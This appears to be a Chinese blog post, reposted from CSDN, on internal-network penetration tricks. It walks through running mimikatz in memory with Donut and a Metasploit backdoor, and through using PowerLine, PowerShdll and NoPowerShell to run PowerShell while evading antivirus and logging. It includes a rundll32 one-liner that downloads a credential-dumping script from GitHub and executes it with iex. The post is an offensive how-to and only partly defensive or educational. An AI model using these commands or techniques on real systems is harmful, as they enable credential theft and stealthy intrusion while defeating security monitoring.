内网一些渗透技巧

渗透技巧

msf+Donut交互式执行程序

简介

工具 Dount

Donut从VBScript,JScript,EXE,DLL(包括.NET程序集)文件生成x86或x64 Shellcode。 可以将此Shellcode注入到任意Windows进程中以在内存中执行。

使用方法
  1. 先msf生成一个后门程序,执行

  2. 然后执行

    /donut /usr/share/mimikatz/bypass360/mimikatz/sign-katz-x64.exe -a 2 -0 /tmp/payload.bin

    -a:是指定位数,2位64位
    -o:是指定输出

    得到一个

    2.png

  3. 用msf执行模块

得到一个交互式mimikatz

5.png

无powershell运行powershell方法

PowerLine
简介

是一款由c#编写的工具,支持本地命令行调用和远程调用,可以在不直接调用PowerShell的情况下调用PowerShell脚本,优点如下:

  • 自动识别win7、win10系统
  • 使用方便,无需复杂的ide
  • 自动xor编码

下载地址

使用
  • 首先拉取项目到本地,然后运行build.bat文件

    在这里插入图片描述

  • 然后在UserConf.xml文件中填写你所需要调用的powershell脚本的地址,默认自带powerup、powerview、Mimikatz等,只要按照他给定的格式加入你的ps脚本地址即可

  • 加入完成以后,运行PLBuilder.exe进行构建

PowerShdll
简介

主要使用dll去运行powershell而不需要去连接powershell.exe,所以具有一定的bypassAV能力,当然它也可以在这几个程序下运行rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe, regsvr32.exe或者使用作者给出的单独的exe进行执行

使用
  • 使用PowerShdll -i进入到交互模式,此时便获得了一个交互式的PS环境,可执行任意的powershell命令

在这里插入图片描述

  • dll版用法

    rundll32 PowerShdll.dll,main . { iwr -useb https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1 } ^| iex;

Nopowershell
简介

是用C#实现的工具,它支持执行类似PowerShell的命令,同时对任何PowerShell日志记录机制都不可见。同时也提供了CS下的cna脚本。

使用

.\NoPowerShell.exe

直接运行可得版本和帮助命令

SyncAppvPublishingServer
简介
使用

msbuild

microsoft.com

猜你喜欢

转载自blog.csdn.net/qq_43271194/article/details/110393788
今日推荐